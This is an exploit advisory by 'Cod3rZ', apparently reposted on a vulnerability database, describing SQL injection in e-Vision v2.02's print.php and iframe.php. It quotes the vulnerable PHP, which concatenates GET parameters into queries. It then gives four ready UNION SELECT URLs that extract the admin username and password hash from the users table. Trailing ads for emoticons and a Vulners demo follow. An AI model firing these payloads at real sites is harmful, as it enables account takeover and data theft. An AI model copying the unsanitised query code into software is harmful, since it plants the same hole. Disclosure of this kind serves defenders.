e-Vision v2.02 Multiple Remote SQL Injection on print.php and iframe.ph
`
---------------------------------------------------------------------------------------------------------------------------
_ ____ _ _ _ _
__ ___ __| |__ /_ _ ___ | |_ ___| | |_____ __ _____| |__ ___ _ _
/ _/ _ \/ _` ||_ \ '_|_ / _ | ' \/ -_) | / _ \ V V / -_) '_ \ _ / -_) || |
\__\___/\__,_|___/_| /__| (_) |_||_\___|_|_\___/\_/\_/\___|_.__/ (_) \___|\_,_|
---------------------------------------------------------------------------------------------------------------------------
e-Vision v2.02 Multiple Remote SQL Injection
---------------------------------------------------------------------------------------------------------------------------
Author: Cod3rZ
Site: http://cod3rz.helloweb.eu
---------------------------------------------------------------------------------------------------------------------------
PoC: (print.php)
---------------------------------------------------------------------------------------------------------------------------
$idcontent = $_GET['id'];
$sql = "SELECT `idcontainer` FROM `content` WHERE `idcontent`='".$idcontent."'";
$res = mysql_query($sql);
$row = mysql_fetch_array($res);
---------------------------------------------------------------------------------------------------------------------------
nickname: print.php?id='+union+select+username+from+users+where+idusers=1/*
password: print.php?id='+union+select+pass+from+users+where+idusers=1/*
---------------------------------------------------------------------------------------------------------------------------
PoC: (iframe.php)
---------------------------------------------------------------------------------------------------------------------------
$sql = "SELECT `".$_GET['field']."` FROM ".$_GET['module']." WHERE `id".$_GET['module']."`='".$_GET['id']."'";
$result = mysql_query($sql);
$row = mysql_fetch_array($result);
---------------------------------------------------------------------------------------------------------------------------
nickname: iframe.php?field=idcontainer&module=content&id='+union+select+username+from+users+where+idusers=1/*
password: iframe.php?field=idcontainer&module=content&id='+union+select+pass+from+users+where+idusers=1/*
---------------------------------------------------------------------------------------------------------------------------
That's All
Bye, Cod3rZ
_________________________________________________________________
Scarica GRATIS le tue emoticon preferite!
http://intrattenimento.it.msn.com/emoticon/`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo